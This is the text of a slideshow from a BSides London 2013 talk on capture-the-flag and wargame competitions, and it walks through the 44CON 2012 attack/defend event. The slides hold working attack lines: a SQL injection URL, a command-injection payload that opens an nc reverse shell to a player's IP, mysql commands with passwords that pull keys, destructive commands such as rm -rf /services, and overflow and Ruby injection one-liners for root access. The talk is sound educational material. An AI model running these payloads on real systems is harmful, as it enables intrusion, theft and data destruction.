Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Playing CTFs for Fun & Profit
Me@impdefinedSoftware developerKnow a lot about bugsTrying not to make things worse
MePlaying CTFs for ~2 yearsCTF team 0xbadf00dContributor to io.smashthestack.org
You
Wargames & CTFs
Wargames & CTFs – Why?LearningHands-on experienceLegalFun!(and profit)
Wargames & CTFs – Why?
Wargames
Wargames
WargamesTechnical security exercises
WargamesTechnical security exercisesHacking challenges
WargamesTechnical security exercisesHacking challengesProgress through series of levelsNo time limitsSolo
Wargames - categoriesWebBinary exploitationCryptographyGeneral design flaws
Wargames - examples
Loaded 1 password hash (FreeBSD MD5 [32/32])******* (administrator)guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ***...
Wargames - experience
Playing wargames I got to:Implement a padding oracle attack against RSADespair at the state of PHPImplement a CPU timing a...
Capture the Flag
Capture the FlagTime-limited event to test your skillsTeam-basedCompetitiveNot “progressive”
CTF typesChallenge-basedDEF CON qualsGhost In The ShellcodeCSAW CTFAttack/defendDEF CON finals44Con CTF 2012
CTF typesLots of online events~20 last yearmainly challenge-basedLive events!44CON: LewtRuCTFE: £3,000Codegate: £11,000
Playing CTF
Capture the flag experience
Capture the flag experience
CTF challenge - jacked
CTF challenge - jacked# nc jacked.final2012.ghostintheshellcode.com 2121Jacks Blackjack SimulatorBlackjack pays 2:1Dealer ...
CTF challenge - jacked$1,000,000,000 will win the gameGood random source32bit seedPlayer 1 is Tracy with $1332Player 2 is ...
CTF challenge - jacked
CTF challenge - FollyText adventureOn winning, enter shellcodeBinary is chrooted, make custom codeRead “key” file...get an...
CTF challenge - Follyx86_64x86ARMARM ThumbPPCAlphaCris
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
44CON CTF 2012
44CON CTF 2012Attack & DefendProvided with:Virtual machineIP addressRanges of target machines
Attack & DefendKind of like a pentestbut more funI have a planReconHardenWrite exploitsRun riotGet the girl
ReconId rather be offline than ownedSelf-reconCapture trafficQuick nmap of non-player servers
Recon - services
Recon - services
Recon - scoringPacket captures shed some lightRegular "scoring rounds“Every 30 minutesScoring server stores new keys inser...
Pastie
Pastie
Pastie
Pastie
PastieWritten in PHPPastes stored in a MySQL databasePHP+MySQLCan you tell what the vuln is yet?
Pastie vulnerabilityClassic SQL injection
Pastie fixIt’s not all pwnpwnpwnUpdated code with prepared statementsPHP 
Pastie exploitI want keys!
Pastie exploithttps://ip/view/%+and+lang+=+text+order+by+date+desc+--+
Pastie exploit
Pastie exploit – scripted
Mailserver
MailserverSMTP and POP3 serverKeys stored in emailsWritten in RubyI don’t know RubyOnly ~500 lines
Mailserver - vulnerabilityThis just interprets provided text as ruby codeTime to learn Ruby!???
Mailserver - vulnerabilityLooking at the logs...Verify vulnerability
Mailserver - exploitationIm sure Ruby is lovely...... but lets just find some code to copy
Mailserver - exploitation
Mailserver - exploitation
Mailserver - scripted
Auth
AuthListening on port 23500
Auth
AuthRedis wrapperStores arbitrary strings
Auth vulnerabilitySource analysis 101
Auth vulnerability
Auth exploitationClassic stack buffer overflowOverwrite return address with any valuePre-auth remote code execution...
Auth exploitationClassic stack buffer overflowOverwrite return address with any valuePre-auth remote code execution...... ...
Auth exploitation
Auth exploitationPut a valid writable address in the pointerEasy if this was a 32bit process64bit, annoying memory space
Auth exploitationgdb$ info proc mapMapped address spaces:Start Addr End Addr Size Offset objfile0x400000 0x403000 0x3000 0...
Auth exploitationgdb$ info proc mapMapped address spaces:Start Addr End Addr Size Offset objfile0x0000000000400000 0x00000...
Auth exploitationTime’s up!No remote code execution Very limited DoSCrash processRestarts automatically
Servicemon
Servicemon
Servicemon
Servicemon
ServicemonCommand injection via "filelist"parameter
Servicemon - vulnerabilityfilelist=/services/auth/auth%x(shasum /services/auth/auth)filelist=notafile || id%x(shasum notaf...
Servicemon - vulnerability
Servicemon - exploitationNever mind keys, I want a shellcontestant@ubuntu:~$ nc -l 31337 -e /bin/shnc: invalid option -- e
Servicemon - exploitationStand back... I know bash*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.1.75 31337...
Servicemon - exploitationcontestant@ubuntu:~$ nc -lv 31337Connection from 192.168.1.72 port 31337 [tcp/*]accepted$ whoamic...
Rampage
Rampage
Steal all the keysmysql --user=sinatra --password=44ConCTF servicemon -e"select status from statuses order by created_at d...
Leave a calling cardecho Look behind you! A three-headed monkey! >/services/pastie/.win
Annoyecho exit >> ~/.bashrcrm -rf /servicesecho exportPROMPT_COMMAND="cd" >>~/.bashrc
Escalation
EscalationGetting keys is fineGetting shells is betterGetting root is best
Escalation – the hard way$ find /etc -writable/etc/init/mail.conf/etc/init/auth.conf
Escalation – the hard wayUSER PID TTY STAT COMMANDroot 8680 ? Ss /services/auth/auth
Escalation – the hard wayWhen auth starts we will get a root shellLame DoS to the rescue!perl -e print "auth " . "A"x1100 ...
Escalation – the easy way220 Mail Service ready (33147)HELO250 Requested mail action okay, completedEXPN respond(client, %...
Playing wargames & CTFs
Useful stuff – generalScripting languageHex editorLinux & Windows VMsThe linux “file” command
Useful stuff - webFirefox+ Firebug+ Tamper dataphp.net
Useful stuff - binaryCDisassembler (IDA demo, Hopper)
Useful stuff - CTFCollaboration!Hall.comsync.inWikiIRC
Wargame recommendationsoverthewire.org (Natas) Web exploitationio.smasthestack.org Binary exploitationhackthissite.org Web...
CTF recommendationshttp://ctftime.orgDEF CON CTFJuneBinary-heavyCSAW CTF“gentle” introductionSeptember
Motivation44CON LewtCSAW £600HitB AMS £1,500Plaid £2,500RuCTFE £3,000PHdays £6,000Codegate £11,000
Motivation
Questions@impdefinedimpdefined@0xbadf00d.co.uk
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Playing CTFs for Fun & Profit
Upcoming SlideShare
Loading in …5
×

Playing CTFs for Fun & Profit

907 views

Published on

Presented at BSides London 2013

Published in: Technology
  • Login to see the comments

Playing CTFs for Fun & Profit

  1. 1. Playing CTFs for Fun & Profit
  2. 2. Me@impdefinedSoftware developerKnow a lot about bugsTrying not to make things worse
  3. 3. MePlaying CTFs for ~2 yearsCTF team 0xbadf00dContributor to io.smashthestack.org
  4. 4. You
  5. 5. Wargames & CTFs
  6. 6. Wargames & CTFs – Why?LearningHands-on experienceLegalFun!(and profit)
  7. 7. Wargames & CTFs – Why?
  8. 8. Wargames
  9. 9. Wargames
  10. 10. WargamesTechnical security exercises
  11. 11. WargamesTechnical security exercisesHacking challenges
  12. 12. WargamesTechnical security exercisesHacking challengesProgress through series of levelsNo time limitsSolo
  13. 13. Wargames - categoriesWebBinary exploitationCryptographyGeneral design flaws
  14. 14. Wargames - examples
  15. 15. Loaded 1 password hash (FreeBSD MD5 [32/32])******* (administrator)guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********
  16. 16. Wargames - experience
  17. 17. Playing wargames I got to:Implement a padding oracle attack against RSADespair at the state of PHPImplement a CPU timing attackExploit a kernel stack buffer overflowCreate a JS VM for a custom processor architectureWrite lots of custom shellcodeXOR all the things
  18. 18. Capture the Flag
  19. 19. Capture the FlagTime-limited event to test your skillsTeam-basedCompetitiveNot “progressive”
  20. 20. CTF typesChallenge-basedDEF CON qualsGhost In The ShellcodeCSAW CTFAttack/defendDEF CON finals44Con CTF 2012
  21. 21. CTF typesLots of online events~20 last yearmainly challenge-basedLive events!44CON: LewtRuCTFE: £3,000Codegate: £11,000
  22. 22. Playing CTF
  23. 23. Capture the flag experience
  24. 24. Capture the flag experience
  25. 25. CTF challenge - jacked
  26. 26. CTF challenge - jacked# nc jacked.final2012.ghostintheshellcode.com 2121Jacks Blackjack SimulatorBlackjack pays 2:1Dealer must hit soft 17Single deck, shuffled after every roundEnter your name:pwnYour table companions:Player 1 is Tracy with $1332Player 2 is Grace with $770Player 3 is Curtis with $1376Player 4 is Bryan with $1950You have $1000Place your bet (zero to exit): $
  27. 27. CTF challenge - jacked$1,000,000,000 will win the gameGood random source32bit seedPlayer 1 is Tracy with $1332Player 2 is Grace with $770Player 3 is Curtis with $1376Player 4 is Bryan with $1950
  28. 28. CTF challenge - jacked
  29. 29. CTF challenge - FollyText adventureOn winning, enter shellcodeBinary is chrooted, make custom codeRead “key” file...get another port and binary
  30. 30. CTF challenge - Follyx86_64x86ARMARM ThumbPPCAlphaCris
  31. 31. CTF challenge - blocky
  32. 32. CTF challenge - blocky
  33. 33. CTF challenge - blocky
  34. 34. CTF challenge - blocky
  35. 35. CTF challenge - blocky
  36. 36. CTF challenge - blocky
  37. 37. CTF challenge - blocky
  38. 38. 44CON CTF 2012
  39. 39. 44CON CTF 2012Attack & DefendProvided with:Virtual machineIP addressRanges of target machines
  40. 40. Attack & DefendKind of like a pentestbut more funI have a planReconHardenWrite exploitsRun riotGet the girl
  41. 41. ReconId rather be offline than ownedSelf-reconCapture trafficQuick nmap of non-player servers
  42. 42. Recon - services
  43. 43. Recon - services
  44. 44. Recon - scoringPacket captures shed some lightRegular "scoring rounds“Every 30 minutesScoring server stores new keys inservices and checks for previouskeys
  45. 45. Pastie
  46. 46. Pastie
  47. 47. Pastie
  48. 48. Pastie
  49. 49. PastieWritten in PHPPastes stored in a MySQL databasePHP+MySQLCan you tell what the vuln is yet?
  50. 50. Pastie vulnerabilityClassic SQL injection
  51. 51. Pastie fixIt’s not all pwnpwnpwnUpdated code with prepared statementsPHP 
  52. 52. Pastie exploitI want keys!
  53. 53. Pastie exploithttps://ip/view/%+and+lang+=+text+order+by+date+desc+--+
  54. 54. Pastie exploit
  55. 55. Pastie exploit – scripted
  56. 56. Mailserver
  57. 57. MailserverSMTP and POP3 serverKeys stored in emailsWritten in RubyI don’t know RubyOnly ~500 lines
  58. 58. Mailserver - vulnerabilityThis just interprets provided text as ruby codeTime to learn Ruby!???
  59. 59. Mailserver - vulnerabilityLooking at the logs...Verify vulnerability
  60. 60. Mailserver - exploitationIm sure Ruby is lovely...... but lets just find some code to copy
  61. 61. Mailserver - exploitation
  62. 62. Mailserver - exploitation
  63. 63. Mailserver - scripted
  64. 64. Auth
  65. 65. AuthListening on port 23500
  66. 66. Auth
  67. 67. AuthRedis wrapperStores arbitrary strings
  68. 68. Auth vulnerabilitySource analysis 101
  69. 69. Auth vulnerability
  70. 70. Auth exploitationClassic stack buffer overflowOverwrite return address with any valuePre-auth remote code execution...
  71. 71. Auth exploitationClassic stack buffer overflowOverwrite return address with any valuePre-auth remote code execution...... noooope.
  72. 72. Auth exploitation
  73. 73. Auth exploitationPut a valid writable address in the pointerEasy if this was a 32bit process64bit, annoying memory space
  74. 74. Auth exploitationgdb$ info proc mapMapped address spaces:Start Addr End Addr Size Offset objfile0x400000 0x403000 0x3000 0x0 /services/auth/auth0x602000 0x603000 0x1000 0x2000 /services/auth/auth0x603000 0x604000 0x1000 0x3000 /services/auth/auth0x604000 0x625000 0x21000 0x0 [heap]........ ........ ....... ... ......0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
  75. 75. Auth exploitationgdb$ info proc mapMapped address spaces:Start Addr End Addr Size Offset objfile0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]........ ........ ....... ... ......0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)
  76. 76. Auth exploitationTime’s up!No remote code execution Very limited DoSCrash processRestarts automatically
  77. 77. Servicemon
  78. 78. Servicemon
  79. 79. Servicemon
  80. 80. Servicemon
  81. 81. ServicemonCommand injection via "filelist"parameter
  82. 82. Servicemon - vulnerabilityfilelist=/services/auth/auth%x(shasum /services/auth/auth)filelist=notafile || id%x(shasum notafile || id)
  83. 83. Servicemon - vulnerability
  84. 84. Servicemon - exploitationNever mind keys, I want a shellcontestant@ubuntu:~$ nc -l 31337 -e /bin/shnc: invalid option -- e
  85. 85. Servicemon - exploitationStand back... I know bash*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.1.75 31337 >/tmp/fhttp://ip:3000/hash?filelist=notafile||rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202>%261%7Cnc%20192.168.1.75%2031337%20>%2Ftmp%2Ff* totally copied from somewhere
  86. 86. Servicemon - exploitationcontestant@ubuntu:~$ nc -lv 31337Connection from 192.168.1.72 port 31337 [tcp/*]accepted$ whoamicontestant$ pwd/services/servicemonI got a shell!Now I can have some fun!
  87. 87. Rampage
  88. 88. Rampage
  89. 89. Steal all the keysmysql --user=sinatra --password=44ConCTF servicemon -e"select status from statuses order by created_at desclimit 1;"mysql --user=pastie --password=J@cobsClub$ paste -e"select pastie from pastie order by date desc limit 1;"OUTPUT=redis-cli -r 1 keys * | tail -n 1redis-cli -r 1 lrange $OUTPUT 0 1
  90. 90. Leave a calling cardecho Look behind you! A three-headed monkey! >/services/pastie/.win
  91. 91. Annoyecho exit >> ~/.bashrcrm -rf /servicesecho exportPROMPT_COMMAND="cd" >>~/.bashrc
  92. 92. Escalation
  93. 93. EscalationGetting keys is fineGetting shells is betterGetting root is best
  94. 94. Escalation – the hard way$ find /etc -writable/etc/init/mail.conf/etc/init/auth.conf
  95. 95. Escalation – the hard wayUSER PID TTY STAT COMMANDroot 8680 ? Ss /services/auth/auth
  96. 96. Escalation – the hard wayWhen auth starts we will get a root shellLame DoS to the rescue!perl -e print "auth " . "A"x1100 . "n" |nc ip 23500Connection from 192.168.1.73 port 31337 [tcp/*]accepted# whoamiroot
  97. 97. Escalation – the easy way220 Mail Service ready (33147)HELO250 Requested mail action okay, completedEXPN respond(client, %x(whoami))root
  98. 98. Playing wargames & CTFs
  99. 99. Useful stuff – generalScripting languageHex editorLinux & Windows VMsThe linux “file” command
  100. 100. Useful stuff - webFirefox+ Firebug+ Tamper dataphp.net
  101. 101. Useful stuff - binaryCDisassembler (IDA demo, Hopper)
  102. 102. Useful stuff - CTFCollaboration!Hall.comsync.inWikiIRC
  103. 103. Wargame recommendationsoverthewire.org (Natas) Web exploitationio.smasthestack.org Binary exploitationhackthissite.org Web exploitationoverthewire.org(Vortex)Binary exploitationoverthewire.org(Bandit)"Absolute beginners" (learn how toLinux)
  104. 104. CTF recommendationshttp://ctftime.orgDEF CON CTFJuneBinary-heavyCSAW CTF“gentle” introductionSeptember
  105. 105. Motivation44CON LewtCSAW £600HitB AMS £1,500Plaid £2,500RuCTFE £3,000PHdays £6,000Codegate £11,000
  106. 106. Motivation
  107. 107. Questions@impdefinedimpdefined@0xbadf00d.co.uk

×